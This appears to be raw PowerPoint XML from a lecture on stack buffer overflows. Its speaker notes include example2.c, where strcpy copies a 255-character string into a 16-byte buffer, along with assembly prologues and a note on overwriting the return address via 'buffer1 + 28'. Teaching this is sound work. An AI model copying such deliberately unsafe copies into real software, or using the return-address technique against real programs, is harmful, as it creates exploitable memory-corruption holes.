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7"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId28"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="310" r:id="rId4"/>
    <p:sldId id="311" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="312" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="264" r:id="rId11"/>
    <p:sldId id="296" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="266" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="300" r:id="rId16"/>
    <p:sldId id="298" r:id="rId17"/>
    <p:sldId id="299" r:id="rId18"/>
    <p:sldId id="270" r:id="rId19"/>
    <p:sldId id="290" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="291" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="292" r:id="rId24"/>
    <p:sldId id="273" r:id="rId25"/>
    <p:sldId id="280" r:id="rId26"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6746875" cy="9913938"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr kumimoji="1" sz="2400" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
        <a:ea typeface="新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體" charset="-120"/>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新細明體"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0099FF"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="00CC66"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="33CC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695" autoAdjust="0"/>
    <p:restoredTop sz="72823" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="88" d="100"/>
          <a:sy n="88" d="100"/>
        </p:scale>
        <p:origin x="3216" y="184"/>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24175" cy="4953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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3822700" y="0"/>
            <a:ext cx="2924175" cy="4953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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9418638"/>
            <a:ext cx="2924175" cy="4953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ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34821" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3822700" y="9418638"/>
            <a:ext cx="2924175" cy="4953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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1458E38F-3451-4ED1-98FF-7D566A5C72CA}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>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924175" cy="4953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kumimoji="0" sz="1200">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3821113" y="0"/>
            <a:ext cx="2924175" cy="4953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kumimoji="0" sz="1200">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="895350" y="742950"/>
            <a:ext cx="4956175" cy="3717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7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="4708525"/>
            <a:ext cx="5397500" cy="4462463"/>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54278" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="9417050"/>
            <a:ext cx="2924175" cy="4953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kumimoji="0" sz="1200">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54279" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3821113" y="9417050"/>
            <a:ext cx="2924175" cy="4953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kumimoji="0" sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{940C8AAE-5172-4B06-94E5-A3858A69D94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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="備忘稿版面配置區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sz="800" b="1" dirty="0"/>
              <a:t>void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t> a, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t> b, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t> c) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>   char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>   char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>   // some other codes here  ... ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>("a");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800" b="1" dirty="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>("b");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>("c");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="800" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="投影片編號版面配置區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F5894CD-08F7-41C4-9CC9-5A1E572DF745}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>2</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err="1"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> $20,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{940C8AAE-5172-4B06-94E5-A3858A69D949}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2932840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a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> in C is a sequence of characters with a null character at the end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>example2.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>     char buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[256] = {0};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="en-US" b="1" dirty="0"/>
              <a:t>    for(i = 0; i &lt; 255; i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>] = 'A';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5222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EA8253F5-5E81-49D4-ADF6-7F3804CA750F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>13</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="備忘稿版面配置區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b="1" dirty="0"/>
              <a:t>ASCII table: http://www.asciitable.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>example2.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void function(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    char buffer[16];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>buffer,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[256] = {0};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nn-NO" altLang="en-US" b="1" dirty="0"/>
              <a:t>    for(i = 0; i &lt; 255; i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>] = 'A';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>    function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53252" name="投影片編號版面配置區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359CA34A-BB50-446C-8129-16277B8B71EC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>14</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投影片圖像版面配置區 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="備忘稿版面配置區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lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For our current machine:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.	Why 28 in ret = buffer1 + 28?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-HK" altLang="zh-TW" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“%X\</a:t>
            </a:r>
            <a:r>
